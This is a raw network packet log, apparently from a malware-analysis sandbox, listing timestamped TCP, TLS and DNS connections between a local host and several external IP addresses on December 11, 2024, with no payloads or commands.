                                                                                                                                                                            Dec 11, 2024 09:40:11.732637882 CET4993480192.168.2.53.33.130.190
                                                                                                                                                                            Dec 11, 2024 09:40:12.165033102 CET4993480192.168.2.53.33.130.190
                                                                                                                                                                            Dec 11, 2024 09:40:13.178750038 CET4994480192.168.2.53.33.130.190
                                                                                                                                                                            Dec 11, 2024 09:40:13.298065901 CET80499443.33.130.190192.168.2.5
                                                                                                                                                                            Dec 11, 2024 09:40:13.298626900 CET4994480192.168.2.53.33.130.190
                                                                                                                                                                            Dec 11, 2024 09:40:13.312793970 CET4994480192.168.2.53.33.130.190
                                                                                                                                                                            Dec 11, 2024 09:40:13.434834003 CET80499443.33.130.190192.168.2.5
                                                                                                                                                                            Dec 11, 2024 09:40:13.434848070 CET80499443.33.130.190192.168.2.5
                                                                                                                                                                            Dec 11, 2024 09:40:14.395376921 CET80499443.33.130.190192.168.2.5
                                                                                                                                                                            Dec 11, 2024 09:40:14.395546913 CET80499443.33.130.190192.168.2.5
                                                                                                                                                                            Dec 11, 2024 09:40:14.395620108 CET4994480192.168.2.53.33.130.190
                                                                                                                                                                            Dec 11, 2024 09:40:14.816540003 CET4994480192.168.2.53.33.130.190
                                                                                                                                                                            Dec 11, 2024 09:40:15.821660042 CET4995380192.168.2.53.33.130.190
                                                                                                                                                                            Dec 11, 2024 09:40:15.941756964 CET80499533.33.130.190192.168.2.5
                                                                                                                                                                            Dec 11, 2024 09:40:15.941914082 CET4995380192.168.2.53.33.130.190
                                                                                                                                                                            Dec 11, 2024 09:40:15.951203108 CET4995380192.168.2.53.33.130.190
                                                                                                                                                                            Dec 11, 2024 09:40:16.070686102 CET80499533.33.130.190192.168.2.5
                                                                                                                                                                            Dec 11, 2024 09:40:17.046646118 CET80499533.33.130.190192.168.2.5
                                                                                                                                                                            Dec 11, 2024 09:40:17.046786070 CET80499533.33.130.190192.168.2.5
                                                                                                                                                                            Dec 11, 2024 09:40:17.046952009 CET4995380192.168.2.53.33.130.190
                                                                                                                                                                            Dec 11, 2024 09:40:17.049673080 CET4995380192.168.2.53.33.130.190
                                                                                                                                                                            Dec 11, 2024 09:40:17.168921947 CET80499533.33.130.190192.168.2.5
                                                                                                                                                                            Dec 11, 2024 09:40:24.234639883 CET4434984818.165.220.110192.168.2.5
                                                                                                                                                                            Dec 11, 2024 09:40:24.234723091 CET4434984818.165.220.110192.168.2.5
                                                                                                                                                                            Dec 11, 2024 09:40:24.234925032 CET49848443192.168.2.518.165.220.110
                                                                                                                                                                            Dec 11, 2024 09:40:30.951915026 CET4998980192.168.2.55.39.10.93
                                                                                                                                                                            Dec 11, 2024 09:40:31.072854042 CET80499895.39.10.93192.168.2.5
                                                                                                                                                                            Dec 11, 2024 09:40:31.073023081 CET4998980192.168.2.55.39.10.93
                                                                                                                                                                            Dec 11, 2024 09:40:31.085997105 CET4998980192.168.2.55.39.10.93
                                                                                                                                                                            Dec 11, 2024 09:40:31.205337048 CET80499895.39.10.93192.168.2.5
                                                                                                                                                                            Dec 11, 2024 09:40:32.321997881 CET80499895.39.10.93192.168.2.5
                                                                                                                                                                            Dec 11, 2024 09:40:32.322082996 CET80499895.39.10.93192.168.2.5
                                                                                                                                                                            Dec 11, 2024 09:40:32.322160006 CET4998980192.168.2.55.39.10.93
                                                                                                                                                                            Dec 11, 2024 09:40:32.597361088 CET4998980192.168.2.55.39.10.93
                                                                                                                                                                            Dec 11, 2024 09:40:33.605170012 CET4999580192.168.2.55.39.10.93
                                                                                                                                                                            Dec 11, 2024 09:40:33.725264072 CET80499955.39.10.93192.168.2.5
                                                                                                                                                                            Dec 11, 2024 09:40:33.725374937 CET4999580192.168.2.55.39.10.93
                                                                                                                                                                            Dec 11, 2024 09:40:33.741982937 CET4999580192.168.2.55.39.10.93
                                                                                                                                                                            Dec 11, 2024 09:40:33.863671064 CET80499955.39.10.93192.168.2.5
                                                                                                                                                                            Dec 11, 2024 09:40:34.968708992 CET80499955.39.10.93192.168.2.5
                                                                                                                                                                            Dec 11, 2024 09:40:34.969269991 CET80499955.39.10.93192.168.2.5
                                                                                                                                                                            Dec 11, 2024 09:40:34.969331026 CET4999580192.168.2.55.39.10.93
                                                                                                                                                                            Dec 11, 2024 09:40:35.254359007 CET4999580192.168.2.55.39.10.93
                                                                                                                                                                            Dec 11, 2024 09:40:36.260869980 CET5000180192.168.2.55.39.10.93
                                                                                                                                                                            Dec 11, 2024 09:40:36.381314993 CET80500015.39.10.93192.168.2.5
                                                                                                                                                                            Dec 11, 2024 09:40:36.381413937 CET5000180192.168.2.55.39.10.93
                                                                                                                                                                            Dec 11, 2024 09:40:36.396080017 CET5000180192.168.2.55.39.10.93
                                                                                                                                                                            Dec 11, 2024 09:40:36.515567064 CET80500015.39.10.93192.168.2.5
                                                                                                                                                                            Dec 11, 2024 09:40:40.946909904 CET5000780192.168.2.55.39.10.93
                                                                                                                                                                            Dec 11, 2024 09:40:40.949207067 CET80500075.39.10.93192.168.2.5
                                                                                                                                                                            Dec 11, 2024 09:40:40.949393988 CET5000780192.168.2.55.39.10.93
                                                                                                                                                                            Dec 11, 2024 09:40:40.949522972 CET80500075.39.10.93192.168.2.5
                                                                                                                                                                            Dec 11, 2024 09:40:40.951948881 CET80500075.39.10.93192.168.2.5
                                                                                                                                                                            Dec 11, 2024 09:40:40.952203035 CET80500075.39.10.93192.168.2.5
                                                                                                                                                                            Dec 11, 2024 09:40:40.952331066 CET5000780192.168.2.55.39.10.93
                                                                                                                                                                            Dec 11, 2024 09:40:40.954533100 CET80500075.39.10.93192.168.2.5
                                                                                                                                                                            Dec 11, 2024 09:40:40.954895973 CET5000780192.168.2.55.39.10.93
                                                                                                                                                                            Dec 11, 2024 09:40:40.954907894 CET80500075.39.10.93192.168.2.5
                                                                                                                                                                            Dec 11, 2024 09:40:40.956568956 CET80500075.39.10.93192.168.2.5
                                                                                                                                                                            Dec 11, 2024 09:40:40.956585884 CET80500075.39.10.93192.168.2.5
                                                                                                                                                                            Dec 11, 2024 09:40:40.956891060 CET5000780192.168.2.55.39.10.93
                                                                                                                                                                            Dec 11, 2024 09:40:40.959378958 CET80500075.39.10.93192.168.2.5
                                                                                                                                                                            Dec 11, 2024 09:40:40.959397078 CET80500075.39.10.93192.168.2.5
                                                                                                                                                                            Dec 11, 2024 09:40:40.959745884 CET5000780192.168.2.55.39.10.93
                                                                                                                                                                            Dec 11, 2024 09:40:40.961421967 CET80500075.39.10.93192.168.2.5
                                                                                                                                                                            Dec 11, 2024 09:40:40.961719990 CET80500075.39.10.93192.168.2.5
                                                                                                                                                                            Dec 11, 2024 09:40:40.961749077 CET5000780192.168.2.55.39.10.93
                                                                                                                                                                            Dec 11, 2024 09:40:40.961891890 CET5000780192.168.2.55.39.10.93
                                                                                                                                                                            Dec 11, 2024 09:40:40.965152025 CET5000780192.168.2.55.39.10.93
                                                                                                                                                                            Dec 11, 2024 09:40:41.084599972 CET80500075.39.10.93192.168.2.5
                                                                                                                                                                            Dec 11, 2024 09:40:46.456084013 CET5002980192.168.2.5194.58.112.174
                                                                                                                                                                            Dec 11, 2024 09:40:46.575521946 CET8050029194.58.112.174192.168.2.5
                                                                                                                                                                            Dec 11, 2024 09:40:46.575706959 CET5002980192.168.2.5194.58.112.174
                                                                                                                                                                            Dec 11, 2024 09:40:46.592794895 CET5002980192.168.2.5194.58.112.174
                                                                                                                                                                            Dec 11, 2024 09:40:46.712251902 CET8050029194.58.112.174192.168.2.5
                                                                                                                                                                            Dec 11, 2024 09:40:47.905786037 CET8050029194.58.112.174192.168.2.5
                                                                                                                                                                            Dec 11, 2024 09:40:47.905930042 CET8050029194.58.112.174192.168.2.5
                                                                                                                                                                            Dec 11, 2024 09:40:47.905945063 CET8050029194.58.112.174192.168.2.5
                                                                                                                                                                            Dec 11, 2024 09:40:47.905989885 CET5002980192.168.2.5194.58.112.174
                                                                                                                                                                            Dec 11, 2024 09:40:47.906027079 CET8050029194.58.112.174192.168.2.5
                                                                                                                                                                            Dec 11, 2024 09:40:47.906161070 CET5002980192.168.2.5194.58.112.174
                                                                                                                                                                            Dec 11, 2024 09:40:48.097426891 CET5002980192.168.2.5194.58.112.174
                                                                                                                                                                            Dec 11, 2024 09:40:49.121567011 CET5003580192.168.2.5194.58.112.174
                                                                                                                                                                            Dec 11, 2024 09:40:49.240962982 CET8050035194.58.112.174192.168.2.5
                                                                                                                                                                            Dec 11, 2024 09:40:49.241053104 CET5003580192.168.2.5194.58.112.174
                                                                                                                                                                            Dec 11, 2024 09:40:49.256979942 CET5003580192.168.2.5194.58.112.174
                                                                                                                                                                            Dec 11, 2024 09:40:49.625854015 CET8050035194.58.112.174192.168.2.5
                                                                                                                                                                            Dec 11, 2024 09:40:50.569122076 CET8050035194.58.112.174192.168.2.5
                                                                                                                                                                            Dec 11, 2024 09:40:50.569137096 CET8050035194.58.112.174192.168.2.5
                                                                                                                                                                            Dec 11, 2024 09:40:50.569148064 CET8050035194.58.112.174192.168.2.5
                                                                                                                                                                            Dec 11, 2024 09:40:50.569159985 CET8050035194.58.112.174192.168.2.5
                                                                                                                                                                            Dec 11, 2024 09:40:50.569170952 CET8050035194.58.112.174192.168.2.5
                                                                                                                                                                            Dec 11, 2024 09:40:50.569209099 CET5003580192.168.2.5194.58.112.174
                                                                                                                                                                            Dec 11, 2024 09:40:50.569298029 CET5003580192.168.2.5194.58.112.174
                                                                                                                                                                            Dec 11, 2024 09:40:50.759159088 CET5003580192.168.2.5194.58.112.174
                                                                                                                                                                            Dec 11, 2024 09:40:51.772133112 CET5004180192.168.2.5194.58.112.174
                                                                                                                                                                            Dec 11, 2024 09:40:51.891587973 CET8050041194.58.112.174192.168.2.5
                                                                                                                                                                            Dec 11, 2024 09:40:51.891819954 CET5004180192.168.2.5194.58.112.174
                                                                                                                                                                            Dec 11, 2024 09:40:51.905644894 CET5004180192.168.2.5194.58.112.174
                                                                                                                                                                            Dec 11, 2024 09:40:52.025235891 CET8050041194.58.112.174192.168.2.5
                                                                                                                                                                            Dec 11, 2024 09:40:52.025254011 CET8050041194.58.112.174192.168.2.5
                                                                                                                                                                            Dec 11, 2024 09:40:53.220352888 CET8050041194.58.112.174192.168.2.5
                                                                                                                                                                            Dec 11, 2024 09:40:53.220398903 CET8050041194.58.112.174192.168.2.5
                                                                                                                                                                            Dec 11, 2024 09:40:53.220412016 CET8050041194.58.112.174192.168.2.5
                                                                                                                                                                            Dec 11, 2024 09:40:53.220446110 CET5004180192.168.2.5194.58.112.174
                                                                                                                                                                            Dec 11, 2024 09:40:53.220576048 CET8050041194.58.112.174192.168.2.5
                                                                                                                                                                            Dec 11, 2024 09:40:53.220638037 CET5004180192.168.2.5194.58.112.174
                                                                                                                                                                            Dec 11, 2024 09:40:53.410634041 CET5004180192.168.2.5194.58.112.174
                                                                                                                                                                            Dec 11, 2024 09:40:54.424736023 CET5004780192.168.2.5194.58.112.174
                                                                                                                                                                            Dec 11, 2024 09:40:54.544341087 CET8050047194.58.112.174192.168.2.5
                                                                                                                                                                            Dec 11, 2024 09:40:54.544495106 CET5004780192.168.2.5194.58.112.174
                                                                                                                                                                            Dec 11, 2024 09:40:54.553649902 CET5004780192.168.2.5194.58.112.174
                                                                                                                                                                            Dec 11, 2024 09:40:54.673006058 CET8050047194.58.112.174192.168.2.5
                                                                                                                                                                            Dec 11, 2024 09:40:55.871958017 CET8050047194.58.112.174192.168.2.5
                                                                                                                                                                            Dec 11, 2024 09:40:55.872020960 CET8050047194.58.112.174192.168.2.5
                                                                                                                                                                            Dec 11, 2024 09:40:55.872034073 CET8050047194.58.112.174192.168.2.5
                                                                                                                                                                            Dec 11, 2024 09:40:55.872136116 CET5004780192.168.2.5194.58.112.174
                                                                                                                                                                            Dec 11, 2024 09:40:55.872271061 CET8050047194.58.112.174192.168.2.5
                                                                                                                                                                            Dec 11, 2024 09:40:55.872328997 CET8050047194.58.112.174192.168.2.5
                                                                                                                                                                            Dec 11, 2024 09:40:55.872345924 CET8050047194.58.112.174192.168.2.5
                                                                                                                                                                            Dec 11, 2024 09:40:55.872358084 CET8050047194.58.112.174192.168.2.5
                                                                                                                                                                            Dec 11, 2024 09:40:55.872365952 CET5004780192.168.2.5194.58.112.174
                                                                                                                                                                            Dec 11, 2024 09:40:55.872400999 CET5004780192.168.2.5194.58.112.174
                                                                                                                                                                            Dec 11, 2024 09:40:55.872597933 CET8050047194.58.112.174192.168.2.5
                                                                                                                                                                            Dec 11, 2024 09:40:55.872608900 CET8050047194.58.112.174192.168.2.5
                                                                                                                                                                            Dec 11, 2024 09:40:55.872654915 CET5004780192.168.2.5194.58.112.174
                                                                                                                                                                            Dec 11, 2024 09:40:55.872669935 CET8050047194.58.112.174192.168.2.5
                                                                                                                                                                            Dec 11, 2024 09:40:55.872715950 CET5004780192.168.2.5194.58.112.174
                                                                                                                                                                            Dec 11, 2024 09:40:55.877186060 CET5004780192.168.2.5194.58.112.174
                                                                                                                                                                            Dec 11, 2024 09:40:55.996856928 CET8050047194.58.112.174192.168.2.5
                                                                                                                                                                            Dec 11, 2024 09:41:01.445473909 CET5006980192.168.2.5209.74.64.187
                                                                                                                                                                            Dec 11, 2024 09:41:01.564755917 CET8050069209.74.64.187192.168.2.5
                                                                                                                                                                            Dec 11, 2024 09:41:01.564862967 CET5006980192.168.2.5209.74.64.187
                                                                                                                                                                            Dec 11, 2024 09:41:01.580017090 CET5006980192.168.2.5209.74.64.187
                                                                                                                                                                            Dec 11, 2024 09:41:01.699419022 CET8050069209.74.64.187192.168.2.5
                                                                                                                                                                            Dec 11, 2024 09:41:02.787748098 CET8050069209.74.64.187192.168.2.5
                                                                                                                                                                            Dec 11, 2024 09:41:02.787873030 CET8050069209.74.64.187192.168.2.5
                                                                                                                                                                            Dec 11, 2024 09:41:02.790862083 CET5006980192.168.2.5209.74.64.187
                                                                                                                                                                            Dec 11, 2024 09:41:03.178128004 CET5006980192.168.2.5209.74.64.187
                                                                                                                                                                            Dec 11, 2024 09:41:04.197751045 CET5007580192.168.2.5209.74.64.187
                                                                                                                                                                            Dec 11, 2024 09:41:04.317049980 CET8050075209.74.64.187192.168.2.5
                                                                                                                                                                            Dec 11, 2024 09:41:04.318919897 CET5007580192.168.2.5209.74.64.187
                                                                                                                                                                            Dec 11, 2024 09:41:04.332432985 CET5007580192.168.2.5209.74.64.187
                                                                                                                                                                            Dec 11, 2024 09:41:04.451646090 CET8050075209.74.64.187192.168.2.5
                                                                                                                                                                            Dec 11, 2024 09:41:05.540657043 CET8050075209.74.64.187192.168.2.5
                                                                                                                                                                            Dec 11, 2024 09:41:05.540734053 CET8050075209.74.64.187192.168.2.5
                                                                                                                                                                            Dec 11, 2024 09:41:05.540812969 CET5007580192.168.2.5209.74.64.187
                                                                                                                                                                            Dec 11, 2024 09:41:06.094651937 CET5007580192.168.2.5209.74.64.187
                                                                                                                                                                            Dec 11, 2024 09:41:07.103200912 CET5008180192.168.2.5209.74.64.187
                                                                                                                                                                            Dec 11, 2024 09:41:07.222614050 CET8050081209.74.64.187192.168.2.5
                                                                                                                                                                            Dec 11, 2024 09:41:07.222732067 CET5008180192.168.2.5209.74.64.187
                                                                                                                                                                            Dec 11, 2024 09:41:07.254709959 CET5008180192.168.2.5209.74.64.187
                                                                                                                                                                            Dec 11, 2024 09:41:07.374032021 CET8050081209.74.64.187192.168.2.5
                                                                                                                                                                            Dec 11, 2024 09:41:07.374103069 CET8050081209.74.64.187192.168.2.5
                                                                                                                                                                            Dec 11, 2024 09:41:08.513253927 CET8050081209.74.64.187192.168.2.5
                                                                                                                                                                            Dec 11, 2024 09:41:08.513340950 CET8050081209.74.64.187192.168.2.5
                                                                                                                                                                            Dec 11, 2024 09:41:08.517050982 CET5008180192.168.2.5209.74.64.187
                                                                                                                                                                            Dec 11, 2024 09:41:08.784863949 CET5008180192.168.2.5209.74.64.187
                                                                                                                                                                            Dec 11, 2024 09:41:09.789851904 CET5008780192.168.2.5209.74.64.187
                                                                                                                                                                            Dec 11, 2024 09:41:09.909533024 CET8050087209.74.64.187192.168.2.5
                                                                                                                                                                            Dec 11, 2024 09:41:09.909634113 CET5008780192.168.2.5209.74.64.187
                                                                                                                                                                            Dec 11, 2024 09:41:09.919754028 CET5008780192.168.2.5209.74.64.187
                                                                                                                                                                            Dec 11, 2024 09:41:10.039125919 CET8050087209.74.64.187192.168.2.5
                                                                                                                                                                            Dec 11, 2024 09:41:11.128878117 CET8050087209.74.64.187192.168.2.5
                                                                                                                                                                            Dec 11, 2024 09:41:11.128931999 CET8050087209.74.64.187192.168.2.5
                                                                                                                                                                            Dec 11, 2024 09:42:28.842497110 CET805011747.238.157.253192.168.2.5
                                                                                                                                                                            Dec 11, 2024 09:42:28.843300104 CET5011780192.168.2.547.238.157.253
                                                                                                                                                                            Dec 11, 2024 09:42:31.499033928 CET805011847.238.157.253192.168.2.5
                                                                                                                                                                            Dec 11, 2024 09:42:31.499161959 CET5011880192.168.2.547.238.157.253
                                                                                                                                                                            Dec 11, 2024 09:42:31.500263929 CET5011880192.168.2.547.238.157.253
                                                                                                                                                                            Dec 11, 2024 09:42:31.623332977 CET805011847.238.157.253192.168.2.5
                                                                                                                                                                            Dec 11, 2024 09:42:37.073108912 CET5011980192.168.2.567.223.117.169
                                                                                                                                                                            Dec 11, 2024 09:42:37.192676067 CET805011967.223.117.169192.168.2.5
                                                                                                                                                                            Dec 11, 2024 09:42:37.192802906 CET5011980192.168.2.567.223.117.169
                                                                                                                                                                            Dec 11, 2024 09:42:37.207106113 CET5011980192.168.2.567.223.117.169
                                                                                                                                                                            Dec 11, 2024 09:42:37.326978922 CET805011967.223.117.169192.168.2.5
                                                                                                                                                                            Dec 11, 2024 09:42:38.414628983 CET805011967.223.117.169192.168.2.5
                                                                                                                                                                            Dec 11, 2024 09:42:38.414655924 CET805011967.223.117.169192.168.2.5
                                                                                                                                                                            Dec 11, 2024 09:42:38.414738894 CET5011980192.168.2.567.223.117.169
                                                                                                                                                                            Dec 11, 2024 09:42:38.723031998 CET5011980192.168.2.567.223.117.169
                                                                                                                                                                            Dec 11, 2024 09:42:39.730407953 CET5012080192.168.2.567.223.117.169
                                                                                                                                                                            Dec 11, 2024 09:42:39.849764109 CET805012067.223.117.169192.168.2.5
                                                                                                                                                                            Dec 11, 2024 09:42:39.849849939 CET5012080192.168.2.567.223.117.169
                                                                                                                                                                            Dec 11, 2024 09:42:39.865075111 CET5012080192.168.2.567.223.117.169
                                                                                                                                                                            Dec 11, 2024 09:42:39.984472036 CET805012067.223.117.169192.168.2.5
                                                                                                                                                                            Dec 11, 2024 09:42:41.071592093 CET805012067.223.117.169192.168.2.5
                                                                                                                                                                            Dec 11, 2024 09:42:41.071659088 CET805012067.223.117.169192.168.2.5
                                                                                                                                                                            Dec 11, 2024 09:42:41.071805954 CET5012080192.168.2.567.223.117.169
                                                                                                                                                                            Dec 11, 2024 09:42:41.368546963 CET5012080192.168.2.567.223.117.169
                                                                                                                                                                            Dec 11, 2024 09:42:42.381757021 CET5012280192.168.2.567.223.117.169
                                                                                                                                                                            Dec 11, 2024 09:42:42.501130104 CET805012267.223.117.169192.168.2.5
                                                                                                                                                                            Dec 11, 2024 09:42:42.503256083 CET5012280192.168.2.567.223.117.169
                                                                                                                                                                            Dec 11, 2024 09:42:42.517679930 CET5012280192.168.2.567.223.117.169
                                                                                                                                                                            Dec 11, 2024 09:42:42.637101889 CET805012267.223.117.169192.168.2.5
                                                                                                                                                                            Dec 11, 2024 09:42:42.637114048 CET805012267.223.117.169192.168.2.5
                                                                                                                                                                            Dec 11, 2024 09:42:43.792836905 CET805012267.223.117.169192.168.2.5
                                                                                                                                                                            Dec 11, 2024 09:42:43.792902946 CET805012267.223.117.169192.168.2.5
                                                                                                                                                                            Dec 11, 2024 09:42:43.792953014 CET5012280192.168.2.567.223.117.169
                                                                                                                                                                            Dec 11, 2024 09:42:44.020028114 CET5012280192.168.2.567.223.117.169
                                                                                                                                                                            Dec 11, 2024 09:42:45.039130926 CET5012380192.168.2.567.223.117.169
                                                                                                                                                                            Dec 11, 2024 09:42:45.158528090 CET805012367.223.117.169192.168.2.5
                                                                                                                                                                            Dec 11, 2024 09:42:45.159287930 CET5012380192.168.2.567.223.117.169
                                                                                                                                                                            Dec 11, 2024 09:42:45.171138048 CET5012380192.168.2.567.223.117.169
                                                                                                                                                                            Dec 11, 2024 09:42:45.290469885 CET805012367.223.117.169192.168.2.5
                                                                                                                                                                            Dec 11, 2024 09:42:46.377219915 CET805012367.223.117.169192.168.2.5
                                                                                                                                                                            Dec 11, 2024 09:42:46.377271891 CET805012367.223.117.169192.168.2.5
                                                                                                                                                                            Dec 11, 2024 09:42:46.383856058 CET5012380192.168.2.567.223.117.169
                                                                                                                                                                            Dec 11, 2024 09:42:46.383856058 CET5012380192.168.2.567.223.117.169
                                                                                                                                                                            Dec 11, 2024 09:42:46.503154039 CET805012367.223.117.169192.168.2.5
                                                                                                                                                                            Dec 11, 2024 09:42:52.457398891 CET5012480192.168.2.585.159.66.93
                                                                                                                                                                            Dec 11, 2024 09:42:52.576858997 CET805012485.159.66.93192.168.2.5
                                                                                                                                                                            Dec 11, 2024 09:42:52.577030897 CET5012480192.168.2.585.159.66.93
                                                                                                                                                                            Dec 11, 2024 09:42:52.593290091 CET5012480192.168.2.585.159.66.93
                                                                                                                                                                            Dec 11, 2024 09:42:52.713488102 CET805012485.159.66.93192.168.2.5
                                                                                                                                                                            Dec 11, 2024 09:42:54.097806931 CET5012480192.168.2.585.159.66.93
                                                                                                                                                                            Dec 11, 2024 09:42:54.217776060 CET805012485.159.66.93192.168.2.5
                                                                                                                                                                            Dec 11, 2024 09:42:54.217987061 CET5012480192.168.2.585.159.66.93
                                                                                                                                                                            Dec 11, 2024 09:42:55.101396084 CET5012580192.168.2.585.159.66.93
                                                                                                                                                                            Dec 11, 2024 09:42:55.221533060 CET805012585.159.66.93192.168.2.5
                                                                                                                                                                            Dec 11, 2024 09:42:55.223320007 CET5012580192.168.2.585.159.66.93
                                                                                                                                                                            Dec 11, 2024 09:42:55.239033937 CET5012580192.168.2.585.159.66.93
                                                                                                                                                                            Dec 11, 2024 09:42:55.358505011 CET805012585.159.66.93192.168.2.5
                                                                                                                                                                            Dec 11, 2024 09:42:56.753294945 CET5012580192.168.2.585.159.66.93
                                                                                                                                                                            Dec 11, 2024 09:42:56.873224020 CET805012585.159.66.93192.168.2.5
                                                                                                                                                                            Dec 11, 2024 09:42:56.873483896 CET5012580192.168.2.585.159.66.93
                                                                                                                                                                            Dec 11, 2024 09:42:57.758574009 CET5012680192.168.2.585.159.66.93
                                                                                                                                                                            Dec 11, 2024 09:42:57.878014088 CET805012685.159.66.93192.168.2.5
                                                                                                                                                                            Dec 11, 2024 09:42:57.878108978 CET5012680192.168.2.585.159.66.93
                                                                                                                                                                            Dec 11, 2024 09:42:57.893518925 CET5012680192.168.2.585.159.66.93
                                                                                                                                                                            Dec 11, 2024 09:42:58.013247967 CET805012685.159.66.93192.168.2.5
                                                                                                                                                                            Dec 11, 2024 09:42:58.013262987 CET805012685.159.66.93192.168.2.5
                                                                                                                                                                            Dec 11, 2024 09:42:59.395418882 CET5012680192.168.2.585.159.66.93
                                                                                                                                                                            Dec 11, 2024 09:42:59.515425920 CET805012685.159.66.93192.168.2.5
                                                                                                                                                                            Dec 11, 2024 09:42:59.515475988 CET5012680192.168.2.585.159.66.93
                                                                                                                                                                            Dec 11, 2024 09:43:00.413573980 CET5012780192.168.2.585.159.66.93
                                                                                                                                                                            Dec 11, 2024 09:43:00.533065081 CET805012785.159.66.93192.168.2.5
                                                                                                                                                                            Dec 11, 2024 09:43:00.535290003 CET5012780192.168.2.585.159.66.93
                                                                                                                                                                            Dec 11, 2024 09:43:00.543303967 CET5012780192.168.2.585.159.66.93
                                                                                                                                                                            Dec 11, 2024 09:43:00.662697077 CET805012785.159.66.93192.168.2.5
                                                                                                                                                                            Dec 11, 2024 09:43:01.878988981 CET805012785.159.66.93192.168.2.5
                                                                                                                                                                            Dec 11, 2024 09:43:01.879012108 CET805012785.159.66.93192.168.2.5
                                                                                                                                                                            Dec 11, 2024 09:43:01.879151106 CET5012780192.168.2.585.159.66.93
                                                                                                                                                                            Dec 11, 2024 09:43:01.881756067 CET5012780192.168.2.585.159.66.93
                                                                                                                                                                            Dec 11, 2024 09:43:02.003077030 CET805012785.159.66.93192.168.2.5
Timestamp    Source Port    Dest Port    Source IP    Dest IP
                                                                                                                                                                            Dec 11, 2024 09:39:51.611890078 CET44362885172.64.41.3192.168.2.5
                                                                                                                                                                            Dec 11, 2024 09:39:51.615184069 CET62885443192.168.2.5172.64.41.3
                                                                                                                                                                            Dec 11, 2024 09:39:51.617228985 CET62885443192.168.2.5172.64.41.3
                                                                                                                                                                            Dec 11, 2024 09:39:51.617758989 CET62885443192.168.2.5172.64.41.3
                                                                                                                                                                            Dec 11, 2024 09:39:51.618175030 CET62885443192.168.2.5172.64.41.3
                                                                                                                                                                            Dec 11, 2024 09:39:51.876844883 CET44362885172.64.41.3192.168.2.5
                                                                                                                                                                            Dec 11, 2024 09:39:51.931206942 CET44362885172.64.41.3192.168.2.5
                                                                                                                                                                            Dec 11, 2024 09:39:51.931408882 CET44362885172.64.41.3192.168.2.5
                                                                                                                                                                            Dec 11, 2024 09:39:51.931420088 CET44362885172.64.41.3192.168.2.5
                                                                                                                                                                            Dec 11, 2024 09:39:51.931428909 CET44362885172.64.41.3192.168.2.5
                                                                                                                                                                            Dec 11, 2024 09:39:51.931453943 CET44362885172.64.41.3192.168.2.5
                                                                                                                                                                            Dec 11, 2024 09:39:51.985244036 CET62885443192.168.2.5172.64.41.3
                                                                                                                                                                            Dec 11, 2024 09:39:51.985333920 CET62885443192.168.2.5172.64.41.3
                                                                                                                                                                            Dec 11, 2024 09:39:52.298731089 CET44362885172.64.41.3192.168.2.5
                                                                                                                                                                            Dec 11, 2024 09:39:52.333853006 CET62885443192.168.2.5172.64.41.3
                                                                                                                                                                            Dec 11, 2024 09:39:59.734719992 CET6411153192.168.2.51.1.1.1
                                                                                                                                                                            Dec 11, 2024 09:39:59.872400999 CET53641111.1.1.1192.168.2.5
                                                                                                                                                                            Dec 11, 2024 09:40:07.385991096 CET5857753192.168.2.51.1.1.1
                                                                                                                                                                            Dec 11, 2024 09:40:07.859210968 CET53585771.1.1.1192.168.2.5
                                                                                                                                                                            Dec 11, 2024 09:40:08.989829063 CET62885443192.168.2.5172.64.41.3
                                                                                                                                                                            Dec 11, 2024 09:40:08.989975929 CET62885443192.168.2.5172.64.41.3
                                                                                                                                                                            Dec 11, 2024 09:40:09.304446936 CET44362885172.64.41.3192.168.2.5
                                                                                                                                                                            Dec 11, 2024 09:40:09.305927038 CET44362885172.64.41.3192.168.2.5
                                                                                                                                                                            Dec 11, 2024 09:40:09.307070017 CET44362885172.64.41.3192.168.2.5
                                                                                                                                                                            Dec 11, 2024 09:40:09.307408094 CET62885443192.168.2.5172.64.41.3
                                                                                                                                                                            Dec 11, 2024 09:40:11.361370087 CET62885443192.168.2.5172.64.41.3
                                                                                                                                                                            Dec 11, 2024 09:40:11.363116980 CET62885443192.168.2.5172.64.41.3
                                                                                                                                                                            Dec 11, 2024 09:40:11.675440073 CET44362885172.64.41.3192.168.2.5
                                                                                                                                                                            Dec 11, 2024 09:40:11.676178932 CET44362885172.64.41.3192.168.2.5
                                                                                                                                                                            Dec 11, 2024 09:40:11.676939964 CET44362885172.64.41.3192.168.2.5
                                                                                                                                                                            Dec 11, 2024 09:40:11.678014040 CET44362885172.64.41.3192.168.2.5
                                                                                                                                                                            Dec 11, 2024 09:40:11.807231903 CET62885443192.168.2.5172.64.41.3
                                                                                                                                                                            Dec 11, 2024 09:40:22.069008112 CET5615253192.168.2.51.1.1.1
                                                                                                                                                                            Dec 11, 2024 09:40:22.379512072 CET53561521.1.1.1192.168.2.5
                                                                                                                                                                            Dec 11, 2024 09:40:30.444436073 CET5211153192.168.2.51.1.1.1
                                                                                                                                                                            Dec 11, 2024 09:40:30.949043036 CET53521111.1.1.1192.168.2.5
                                                                                                                                                                            Dec 11, 2024 09:40:45.980247021 CET5352353192.168.2.51.1.1.1
                                                                                                                                                                            Dec 11, 2024 09:40:46.453191996 CET53535231.1.1.1192.168.2.5
                                                                                                                                                                            Dec 11, 2024 09:40:53.604561090 CET64872443192.168.2.5172.64.41.3
                                                                                                                                                                            Dec 11, 2024 09:40:53.606281042 CET64872443192.168.2.5172.64.41.3
                                                                                                                                                                            Dec 11, 2024 09:40:53.606457949 CET64872443192.168.2.5172.64.41.3
                                                                                                                                                                            Dec 11, 2024 09:40:53.606587887 CET64872443192.168.2.5172.64.41.3
                                                                                                                                                                            Dec 11, 2024 09:40:54.628922939 CET64872443192.168.2.5172.64.41.3
                                                                                                                                                                            Dec 11, 2024 09:40:54.629024982 CET64872443192.168.2.5172.64.41.3
                                                                                                                                                                            Dec 11, 2024 09:40:54.629997015 CET64872443192.168.2.5172.64.41.3
                                                                                                                                                                            Dec 11, 2024 09:40:54.630245924 CET64872443192.168.2.5172.64.41.3
                                                                                                                                                                            Dec 11, 2024 09:40:54.690325975 CET44364872172.64.41.3192.168.2.5
                                                                                                                                                                            Dec 11, 2024 09:40:54.690855026 CET44364872172.64.41.3192.168.2.5
                                                                                                                                                                            Dec 11, 2024 09:40:54.691806078 CET64872443192.168.2.5172.64.41.3
                                                                                                                                                                            Dec 11, 2024 09:40:54.722438097 CET64872443192.168.2.5172.64.41.3
                                                                                                                                                                            Dec 11, 2024 09:40:54.946002960 CET44364872172.64.41.3192.168.2.5
                                                                                                                                                                            Dec 11, 2024 09:40:54.946029902 CET44364872172.64.41.3192.168.2.5
